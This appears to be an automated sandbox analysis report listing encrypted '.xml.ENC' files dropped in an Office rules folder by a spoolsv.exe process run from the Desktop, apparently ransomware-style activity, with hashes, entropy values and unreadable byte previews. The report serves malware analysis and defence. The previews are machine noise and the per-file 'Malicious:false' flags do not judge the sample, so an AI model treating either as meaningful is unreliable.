                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....w.W.W.M...i...S+....a.4..Yx.........#..P@..`......n....A7...ADQ.......4..s.m..=.&.,G^.'...7....w..{.G.)Q.#.L.J....v.F......P........Q.&.C;.X.Z.....8.=...3..v.Wf.T'.+[..B.5..B.[.!l:~.H.v..\.+%....4d...;......3h..Y..>.*D..A...l....#.7..<.X.......4./.o.6..$..S7..yw.<..A..~e.:04..^2...{`C.....j:.7...\x...(~>.fM6.(,..C.t....1X62.2.T,b._g..%.....c.Ry....K.O.^W4.[.dn.w"....U.F.._..`u.>....^......%O....xF..V.3[..+.?Q.......cF.D..Q..} ..G..a.4..U..x...:.SB*dI....4.....pu/..Cf<......(.[.~J=p~....J.iX...M....\?l..83......./...... ..TV..~...].VXE.....?.H.._.v.....7O..H.\....'...j.?...>..W..B|t....&.....H....!Q.L<..^bd.g..5..m./...e.0.|..Iv....a[7..*..-../.!..[..d.).T...N....>...$.f...r...eI..(.o.r.. %....&Y.-i.H7.2....ya*X+.......X ...........Y.;..LN...*.....d...c.Q...nJ.ZR-^.......WoD..:4M.ZL...>....D.p....0.....m...c.Y.J.o=.).o....^.....tl..!...dr....q...([..w.....9..M....N.K.|.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700851v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.869854515329743
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2LO8nTolkvt+UnEmSODQxZmm88InUhWxabRn9Rtaf27HgnU7JuijZP8oFl:+qOOzV6CQ1kUhb9ue7HgU7JuijZ02l
                                                                                                                                                                                                                                                      MD5:9C87381BB53E8728844A515A7BA1FB10
                                                                                                                                                                                                                                                      SHA1:59AEA029F8D28D3BD47B8D83EA54D8B69CE4FFB3
                                                                                                                                                                                                                                                      SHA-256:1CC22245D6A9AC2BA55822BCB4AAB4BCEB3378EC426588FF1799B232F4489FDC
                                                                                                                                                                                                                                                      SHA-512:212554DF7C95C193C90111F70862D157BC8374DC651552A00AA4A5CAF84ED78AAA079E04A402CA9B69464467FA71950433629F0D038213DFDD2B126E6FC26C5E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...6..^.....@.A....D5....uFU.M.::$.Bj.w.U%|.~..b.i^.e[...^.I[=X..[.=..<cg.,DY+..j.}...F..>.Qd$...2j....[^...i.Eq.[O..*t.:..*og....N),q<j... .......C...3j...SD.....P.*..1.[>r^.2._V..M..]...."W..p5t.7..e{...Q.k.2............v.:...3.Pi...W>.......$../...DMG.jf..........F....%..;..E..%b..:,...%....K+7.U.`.[;.o..7[.nI.}..I..6.;..a../p}.T-3...S|....gX......w.6.42-.....WZ4.C.H..c..l^aJ.L.#.u.8....Zr.{..\v..N...CK...!....3?.U"...;.4...UH.`....&>.g_....o.mx.E.l&7X..&.....-h..i..M!...c;{...4.`...0..>.M.Y.n...|.H.`."x7 ....t......H.......q..GSv;...Ilr...=C&e.M..W..&..[>..Xv...J8$G..17Fz.+WL....<..&..y../.n..?.WZ.2.......s...c..s=lr..JU...x....../.....{C..f..."..nj.H6>...]...M1.o.....I.O..a.........3.o...{.h.........OR.r.uM {.M....F.U6.....1......^4 .4.....G.....@F.|.R.%...)..9....l.g.t[b..."Qxt-......w..@.......6.T-...gBX...LV^\.l._...:....M..D.4z.R.]"c.#....*.a......[. 4V..).h.< .....l....8.b.N...0.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700900v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.858926909646177
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+HQPFQ4u1Atz6rFMOIiEk3jdhNnX3dH3Vd/orp/57P0/6nxMGxnF6Fff:+wC4u/MOIpwjnpnhlFQiyxMunF6Fff
                                                                                                                                                                                                                                                      MD5:BCF6E5B07E2BC12CD8781F8F6C4153CF
                                                                                                                                                                                                                                                      SHA1:CE2DBE0113F5AD340BE592C05A1893EBBE349E3B
                                                                                                                                                                                                                                                      SHA-256:E671F2C9C463F024408415803407BC4D62F91400F72F96DCA4CF517438A7F02D
                                                                                                                                                                                                                                                      SHA-512:C3E6301CA3E4BCAD7045A3AC958DEF16114D69CE01BB81679984E087A46E4FEBEF00E941A441E24079FE31D559858B3D45E9E9E8C66AD63C6F41D8FA5A7B9DED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.`.;u'..6j%........##f.(.^RB..Wx.....DB..p..*m..M.<Mk..t.g..j[*c_:>'.^~u.#..d.+.m.j.c&....y...}.S\.+..:...H...>.u.<.?/......%..gC>.......j.....r......3.......S...B.^..5.W.Up2.`...).U.....#I...ol...M8U.r.U.i....u......d&....{......SU.#.=.k...d...5)...Zzs........6..T.G....].AA..U.g.'..?<....y...b.. ..... ..r....c.j<.rmNN...*....Gs|..$......(".....u.X.. .....Z...v_...O{.u8...c....UH..6..................q......Y..A.......!R.....W4R...k'....S..y..."...B...n..&.UqS..z..p..Q.h&.j;l&~......Q..9gv.......i...xr}.....}af9...F.W...>..;...0...k..sEi.F`.....*.5.....O.(.?.....L...$.....c.N.._....N.g......H...=..D.......*.|....S.........~n.3.....)eX..8vc|.|L./.....wu...QG..[R...(...i$.q.vK...E{.Y.SJMNZa....kf....d.~...o:.t%.w.[4{l..P.q.......V..Z..m.{o.5G....tVh..Rn..dh.....x.<\..;.4i....025H/....(5~Y(.:.G..d....1...e.f#.0...\T......l&^..w...[}.....X.!._..>:....:or.....s...|.....M..;..7c[.'....t4pG..?..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700901v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.853134320598776
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+FgGMG3YoASSHBCJH9L+qBOWczUvSJOHu/I8GvEi9JacT1WGFqepm1:+FgijcEHIJIaJOHII8gEij9IAqew1
                                                                                                                                                                                                                                                      MD5:8F9CFB7A7DF6EC43C10F5135717FA46C
                                                                                                                                                                                                                                                      SHA1:EF6A1225FBC075EC8DC53810FD4E7A05090B1612
                                                                                                                                                                                                                                                      SHA-256:14ABF90FF3EA7F8B36E0FE637FFB55CB3CD2E87550FD1B4EC3DB2AC3D8992B90
                                                                                                                                                                                                                                                      SHA-512:98E2D77C37097D6B50E8C5BFDBEED857783A191E67A6101BE1D50D919AA42B83DFD62748B25E2649E2C09C0AF45B65072FD54FAA7DF451405CBE41B6B983343F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...l.-^.....C..y...=...!D./..J...rx.G.7..!:A?..../T.B%9e...2..B...I.h........i.c,a..F!Vo..H..c..iuO.)(...L.jJ..@..*........._..G^1Y..l......II,. m.8..E.{...D.xD_...T(..NH...:..h..$m.......=.]..bO.8.....c..J.lD....Av#......Yf..z.Z....B\.C...~....~.P6-.fy.../a..ol=].. ..Jfx...7......~../..~Z...Y.'a...>I...A6...H.x.az.b..5$../?../.u.q.....:..u.....7.~OU...q........h'......?v@..j...rT{,... m..............B.....r.2....G......>bAK...5T~D'Hr`.;w.&|.U....7./.{.a.w.....k.....R._W..#..h.Y.J.3..T.C......(X..........4...$...t(.7...}....0..Q]|....8.3....!Q...@GK..;4cr+a....hui.+....9....R.0..lm.T'X....9.B.....D......6B\YJ.h/E.e.JUQ..Q.V..;.g...U^=..1....../w$c.-..k_U...==..4....>.L..PioSK.u.......6...'.nbJt|a{2.#jw......'......W~..+..C.....O]..V&:.U.......Z...9-W......).../M........I.@7,.5.:..._I-<....o..R.c._x..Ib(..H.........'nc_c}F.....S..l........5...C<#......OMQ1..6.......DKn....8R6N"...c.9r.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700950v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.835935229612102
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Dh5bcL2teyM6AUmHr8gPsEMVVBw0VSOjIbntbCBTaNZ9W/kYkNRIPAcvn0kpDMe:+DjbpM6tmHrD3WVBwClGnJCaZ9WLkNaD
                                                                                                                                                                                                                                                      MD5:4522D84D83BBE371DB5D12529951852B
                                                                                                                                                                                                                                                      SHA1:B4D5825B87082120B0A79ED6B43AD4C247A93BA6
                                                                                                                                                                                                                                                      SHA-256:C746DE33DF68855D7718E9885A89CA1F0BFAA8E49DB2455A1E9327DCF3B167A5
                                                                                                                                                                                                                                                      SHA-512:AC978E6C3293B6D308782468CBCFB7DE4334E9D763C1642545BF4509A21E8C623B9C14810CF27FFD7E5AB96465A6B3F6A6EE5CD8CE98C013F5D24B9F3D43D128
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....1}N..C.r....R........k..f..$.O."..y..j]k....K.......i...(.^..D....[J.).(....l.......+.".b.W.`...-S9.N.'*.c..........=..^. '..Q~.h..X....5:.Q.g.....O...1.L.N..J......e......M..+.aZ.>.hO.]..m.|.....<..5i..)&......._.7...M^..(.=...U..........5....Z...<r1..b.....6..'B69MtI{....*.k>l..lK....}.R...(.......`.:..F.JfaI...f.........=....I.K....VY..e.^.>..=...xC......<.......c...T..Un..\....@/...... H.5kW...l2....G.g.Sq....VK..a...6...L..F#.fz.e.].##..8'..,.....a.Yt]h...v.....1...K1bPx4.A.3}....t.V5.eAr].i.N....m..t..H42.......&.*fS.z...|;...?.P..;M.nVcg*.+ktx...K.=./]2.Q)....|.^d...7...c..M.aPS.....c|.c...L>.;......n.O...B.I....`..E,.....W'..M...-0..dD.a.Mg~}N..a.j.4w.,.]..?.*.8FQ.<..No.nM...i..me+9.>.@.v...h.....[9...........0.4V...z.....+.......?..-.n?F.*...):...t.....z..#k.{....]=..b..F2k.5.:.....Z....e.7h].|....W!P.:@Q.k..K..%...+.h2zE.4.`-...dD....Sk...hFQ2.,S5.@....'.....e...'.]...A......A.z...~.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700951v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.863337766785683
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+IiITimKXxA1MTWq7UScNIaKBhDWitfhZvz4WLbASM6KX+5f:+IpXKXxWrSwTKdfhNkwASdF1
                                                                                                                                                                                                                                                      MD5:9335B85AC017F649E5DB2838E548EE38
                                                                                                                                                                                                                                                      SHA1:3014386D65E4993C0CD01F8B670D44FC9306EFCC
                                                                                                                                                                                                                                                      SHA-256:AB9B07319D38B7DA1FDD536C159E442FA3BAFC23FCE36072BF80D104EAAF94C2
                                                                                                                                                                                                                                                      SHA-512:9038643082965066BF3F092F2154D2D6F701E3EB0288441B675ECF148808E7E0EF194985C7F4B5C014936BA8C99BF35180F8362822A94495CFEFA91400281979
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...Z..7d.....W.(1...Ij....f..Z..Z._..|..9.#6....ag|.@%l..Psb0....8..X..`.MWT....v(.M......A....Zv iM'..H..u.w....z..x.>I.. S......R.1..>/].,.....]...z.Tgs..@%2.6.2.......wq....2...p...X.v...qe.,...".i.UD..9...~..H.N.3..{.8....E3...td..HO9..}oB..P.kT..3|/.3u....76B1<*.gi.MVj....#.J..z.q't3...._$P..H..u...q/U.1.N.u0..4..*}...c..."@.L..u.s....{...n......e.Q..\......:..,&....c.F...8.J.Mu.B..yb....>..{..:R9....).......zZ...}.MeQ.;.$.[...?..).q..~T...Cp!.m...%{.J..d.......&......W...5..{..!q u..a]...Ev.MU..f.S...iF.q7...?....r...\......i.u_...._...SJ......t.$w.....TY.1.)..^2$V.......q.....!r..R2Xr....e.:....G....6....X.......b.@< 7lF.z../r....}V0.............4Z....}..q.DU.mp.l..y.........h...0$.z......Ce.......JZ.I.cm9.%.......j.YWr}\..../G..}.....RcU,.EP.ed.vK.u4{..]..a.)..c?..*.,.........x=90..\0M..G.....i ..+.N..^I...F.....$.I...-.>..U.Ur...[.{*...8Cd....vzX<.*..z..}...X..Vr7M..A.k...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701050v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8405571565673515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+izIuAA4ys+bvPFf1JwpPNc4RpfOJXuXfqGp/JnN4FZKePtdibe:+izv7bNbN1ipPNcYfgnGp/REtdibe
                                                                                                                                                                                                                                                      MD5:6952F399C3A5F72FA8FD0936495AE177
                                                                                                                                                                                                                                                      SHA1:E7EB511664B1870EB3A9F4BAE7273ED49119939F
                                                                                                                                                                                                                                                      SHA-256:6F4412D22F153C6AB63DFBE270545523AB5CF8471FF814C19A35C92E0A0F982F
                                                                                                                                                                                                                                                      SHA-512:74F78E55B87DA2541825F455A538167702A7A6EA7F4F9F4F008A1359DB983BDC5981F0454A0993DBDC50008575657C37C394876EFFD5F5757FD0FBADCAA4EFC3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....`.gc..#sI0s.m[....z.Xwm...U0. |.{.9..V...5....2..D....^.....X.I#..k..{?..jp..:.m.Ov.J0.jD....1..e........\.q...VW..Y. ]i0...tM..?{O.(...%.f.;..8.hXu.F.....NE.....m.E.Gki........>h.V%.Q..am....y8...U..A..sj..Q`;9a.5.Q!R.....4..._S.+.@...k..3...?N..-%r....B.....?..R...P....i..:3...K..D.P...puM...dd..#..._.5.....0E.4t..#a...z.j&..k{...X.t.R.F$Dl*.w...C.....K.v...HH.E..=dWxu1...4.......T..a"N.........X$q..............L.6.$.S.....7...!7..+.h...(...v.@..).S....g.).......r1...#..Ip.o...}....].e.....c.P..cPF.....;|`.:..2...>(...C.Uu..L.Y.m.K..2S.i|.sX........yN....V.x$.:.w...t.O...'..(j.kJI.B..8r,..7......K_.M.Wk......qB..Y'.1V.O....!.~a.T.....g.....n......D..([.?..O..C..Q...%..+.(.+y.J+vR.....%e....._....z.......@.#{..:........O.........R .=d:.E.^.k>.......#k=.(.80.Wjd....\...d?...pI.-.;....!'.Yc....8`...s..a.&...S.Z..{/+.,.v2..U....I..p....).......8.t~..0E....M.. &h.vu....g....o.V&.S.?.....x...v}J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701051v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.870573559638668
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2GHAhx1stmEqXwDCHhVeWJCxA8LHBz760p7CzQ6Acn6yitwtBNBE:+FAhxqtmEywGbJ0C8LHt6ao6yiutBNBE
                                                                                                                                                                                                                                                      MD5:ADFA9164C338A1D6B6DA9193DD3EB842
                                                                                                                                                                                                                                                      SHA1:33E1098FD970D61E9A6A6823B96F8D8EF64F8766
                                                                                                                                                                                                                                                      SHA-256:DB394D27B18711A95CD8E2F458514B01B682B35F0895B260DCB87CC9F41418A3
                                                                                                                                                                                                                                                      SHA-512:5ACD0A20A0551533467CCF89256525E8F3D071FB889736DD72EA859D3F0F5689088F44CC9D34DC51DE4F2AB99256FFAB8AC64556CB46C4CEC2C2AF1E46ADC8E4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....Z..C"...z........ID.....NF.sL.@..@..iT.....j....N........i|.MR#.O#.J&85F..W...m...i.5....4....(.....wx..9a... .q0a\..........G........V 9..J..Th.W....(....n.....-.....U...8...I.....j(\....MU#i.....o..-.Ijh..[0..).r......u_......h.tk.0..zI..5w..l...):...r.F....P.......X....8.u.....~..}.$.k.I...>....A....u.qEx.3.)=r.&..&+O..S....a.ZII.....<..F.R$..i5........P...5.Q.l.}_..6.%..LB..X..!.....z%..;u.K(+R..e....3'..y.Z..@.....P....e..p..#7....TM>.).i..F..b....K...>fj..R.t\.....$]..BWy.@b...a.....6.+/i..r.e.....D.Y.k.9.X.....ju....Q..9S.;/R......u../..~...x.....+.4|Mp..P.....[...W...@X.;.......|...yu.....OR..X.(..C.#l#j...)..P....o../..^V...D..H.t.,.`....1.y..lo..?....z.Q)....nt...;......l.*h.....P..D..l|q.s|[\...u... ..{.D..E7..6..5...........>.q.#<1.%...V..P...;...jz'.M.$.P;..y.|.gb.%.&... =C...........o...@...E.....4..ds...e..$.@."Lc.%.m+.j....@.......dN7w<.x..5A.......v4...w2..0.>.Q.Z]...!..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.848493969347596
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+iEOaQn+tQowWc6XQmDNOdx1gWdCGYQuECZBN73gxjhOs4oQzDUNAnk:+iEOT+tQqtUffun72H4oQzDlk
                                                                                                                                                                                                                                                      MD5:0142DE5644234A869820E0D06784AC8E
                                                                                                                                                                                                                                                      SHA1:16390A980BC221A5EF1DBB5515FDE732FEBC2E9A
                                                                                                                                                                                                                                                      SHA-256:8309B9106309902AB65E1A9218AB0345D035651DF075C94EAB1FB6638448A619
                                                                                                                                                                                                                                                      SHA-512:35525F964098AA1E3D05F5858ACA43547EA87095A4789A3D653DBDCADA7803E1E68F173BB109A1B626F26DA55F5B8E605DF47065FBF5D09F7D58FF2DCAEA804B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..:X.3A..88.Z.......x..|n.jV.`.`p.!.4/.J....9.Y...u...|0...+....{>hA..2..<.+...<.f.K.-..~..!..H}...[..Z`f.......I*.Q....c...[.}.:.....#B..T.....[M..O...~2..^x......nKv..J.+.n...K..e..BDV.W..E........78..._..{.2..)..Nb...].3R..4,@..n..5..K..{.......d.T..!..6.X...Kg.............Qm..!...Y.o....s....&K..*.dO...|..\.{...N.1...#..`j......!a'g...0...hA}.z.h:.H...1.....-.......l...|...N...9gK.^..."....Li....x.JU...Zw.l...iq#;c..5Q.*h..c.:R.....p.y(...c.w*.>.....uX....|...(Xx..$....?....X....#..u........NG9.V...r...R.....90v..-..Q$].*....O94....*M....@7w.%.........Y..j.'~l..G3e@7...........D...'?..hK.F..T..... .&q..lk....M.....N....|...QL.a...x<.l.m.C....M.@..Z6...NU....vB...X..........<H'......X.OSm..;....Z.@X..V.h*..@..R..yO.c.(.B..n6.R...+.O..Y.$.P.1.h.;.......j..M.8..F.U.(.AJ..4p}~.Dv..IL..m...%;.."..'8...k.!5.........K..[..<...?..(;DC.kv..9..W......_4W7RV..W..`<.1..... ..*e|...[.]NUhf..0.$<...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.864354624049629
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+j34Vx06oegi4gFrMrpbGR0QS0ZJDO97V/8wkzW8YNLHnJYlAx+omLHqTp:+j3+ozi4gFrM1aRvPDkVUCZNLHfxXmLQ
                                                                                                                                                                                                                                                      MD5:3FE6A12B1DC9B33351868F51703FFC01
                                                                                                                                                                                                                                                      SHA1:F49D0F44D390CEFF1579D1388B0B3A7551F9BC59
                                                                                                                                                                                                                                                      SHA-256:4C0F879213C65D872AD740D421BC27CF48FB031EF84364BF61EA7BA1E7BB22F1
                                                                                                                                                                                                                                                      SHA-512:9384F6793B34636A99BD69120A21B1E5A3EE84C3840EBA9FE4B504EE6CBFF2BB0F02E66156635A0B37417A9D0972D75AA7548341AC9C7F924CD5D62A746C06A0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.m+2..^.o.b[.Ww'}N`..%.9.|u.`.m..w...:`...(.d.......j^../.....8.w....xZk..C...].y9.,...!...O..r.b-.[(.NQ.B@..h.3...c.....Qm.R......t.G.h'.oq..r*....kK...u...U.8.NDyV.-J.t..>hN....q..~g}...$R.{.T.4..z$.NO;.^..[..B.kS`.....g..S......c.o.zI*43.Mr............j$;.^]..:|....Z.......F.....S...G..Y..{.....J..%..}..J......5..........g..9{...G.......W&4.9o.R.....C.........go.\...G..u.J...n..u....v......{..?I..+...-.aB..?...d..Op....`=......!/*.j..=.....f...z.....Y..ry.....n..G.%"ZYENZ...3..p.....m..>..u...1.*..(y.8...n..a.P....~..0..O..Rc....[......h.6..z1..k.........\.\.[;..{.:r.h..-#vA5...(.L.\m.Ul..........`.....A.G..G3+.e..LzZR......HL.;%.0.n...HSq.YZ.q......n..9.....h......'P.ge.w........\..u.r...6..<..../..[e.....XZ-.......2B.Yu.._.wM8.5;..9...ao..........r.....=...>.~(.Y...7.u.T.3rZ..*:1@...J..6..fB.)U....5.....n..,.R9T..k...o.....y...1nXX`..+..<..0h.<..u......@.w...P..o...BQ5...z...i<..NaFA

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.863423319739153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+01wznztkIs3Azt2OFkYMTdC4fLggC+onRrbzp+ROkfg8pyRP2oqWai:+dxxslOFkYEVhXoRr/pYOkfDyRJ31
                                                                                                                                                                                                                                                      MD5:0975B16FC4C5F26571E824455B40BA1C
                                                                                                                                                                                                                                                      SHA1:668B89A1EFB2D1DF28466A7191C56BB753C4D40B
                                                                                                                                                                                                                                                      SHA-256:21B41E6660DEC962F0772861740469108B13FE28C295FAAF7A4480C86DE0AD0F
                                                                                                                                                                                                                                                      SHA-512:BEB7B2F654825D29DBE0D2F3FEA3155AF995CBE108AD2AEF19E85991AED37C3C6701E64D52BDAD4E2CB789F13C133ECF129244B7289F386C76F44901A52206E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.H1...H....J.u.S....a.U.c...Z.....pn$../.L..N..G..u".A>>&..O}...........W2B'...Zs5=;<..#[.L...Vr.....2...3..nK4.0.-F'...Th..e...B...Z.u..2..G..i=..&....U...?.........e6../.Z.H.`...?M#....C.E6......w.unq....n7.....c.;....3..b...;r.j.t.K./b..... .;6.9.x...<f.Ic..au,GaXR....,u...0K.w.g..6....*Z.7...Ze}PSx.Ob.9z..i#..m....F.......+.yT.J:.Y..P.....j.1.1..Z:..g%OH.} .H5....BPk..AIki.....z.7......U.f.!....h$...v.)7....{a8.;K...m.T.m..r..$=....^{9.mI.7Xw....pD+KO...}..0...4..R...2n.....B..h_......|.........{..........m.LK<.K..2Z.3A<..t..}..v..Ng....-..E...*`Be.G...Hz.qQ...qn:J.;.^b.^y......@5.Q'.&...Xs.@H)JU....Y."K....b.<...u.<..k..M.#....(*.B.|b.w..Z,.r.....T.R.AwDhB?P.{..@.Fyf..<..J.G+.LF.m`=.~V!....f-....E.}w........]=.>B.1Y.!.;....n.}.....A..`......(J....x.......mT..a.....Y.....Mn[N{X..Fr.3....T.........0._.z.6..y.r....:...3a..:......2e.l....?....q.f.a.....+.?"....-.Z.......3...]#....W.....4mc.....{@.e.5

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.863417135619777
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+kt1P1nm5JJ6BCljRGFQtLfXPN/d96vQfy1qVDYN59cLEIqptoSfQFrLHGy2f:+I1nm5n6BmFc0z5gQy8V4OLSiLKf
                                                                                                                                                                                                                                                      MD5:C88158D0BF6D9937CB18DD2A0C876748
                                                                                                                                                                                                                                                      SHA1:11078DE2569B377E40468EDFCFC251C91323FF9E
                                                                                                                                                                                                                                                      SHA-256:49F5C197FB9648EF585BA7DD06D16EC3491E1E64D6F43F574A21D158B9D96D08
                                                                                                                                                                                                                                                      SHA-512:24E9DD6D3341427F3B9F0DB36EE53BEF39C9808B37F2480539139AC137E19F63A47252C8250595B58AE2A3AD8BCC3666B7A83F93425A7F60C9429CA387208389
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....x..T........?.......q.w|.K...........).....r..$..............y.../.r...a.u!&A..c.z$k...#..=i..&...\..K..q...Mh..k.....-.y.Vc....z....5~.x.8|]]...]..D..B.<..* .....J...'....N....4A`#..m.T..H.S7.m.=%.6....A...z-.R.[........}..H[..-J.{.e.......M.2v......p.YxX.5..<......Y.Y....%.....M..!..9#m.a.YTl0.oR..,.2..l.Nc.....K...;q.........r.4..~.@....b.5W.....rv.U.n....Vb.e...U....T.../...O....6./.c...0......Fg%4.o....:X.S0........|.Ei.'W..=..jtY.....6...$........Z..i..{C.A.....i.!a....-....a.+.7.X..=....<....y.kMQP..........Os.....\...N"w.....8I*N.|.2.pTY.A4E..............2#..*.8.....-..._I...@......E...{..GS..M?2.........k...y<fp...+...z..p.k.7.p...>42..u'.."Y.4...O.<M....IwN..z......I^ &.t.2/..\.I..V....>(...*.R.)..7.Ow.t.+....7...Y..t~...T...L...4.s.#.).`..L.......j......(...zbv....)7....J.S.D&.,...8R...%.I....D...1.]..X.....K...R.l....I..k...W..M...d5.c...{.vQ+{.....p.......Y...v.:.'._..n..P....+

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
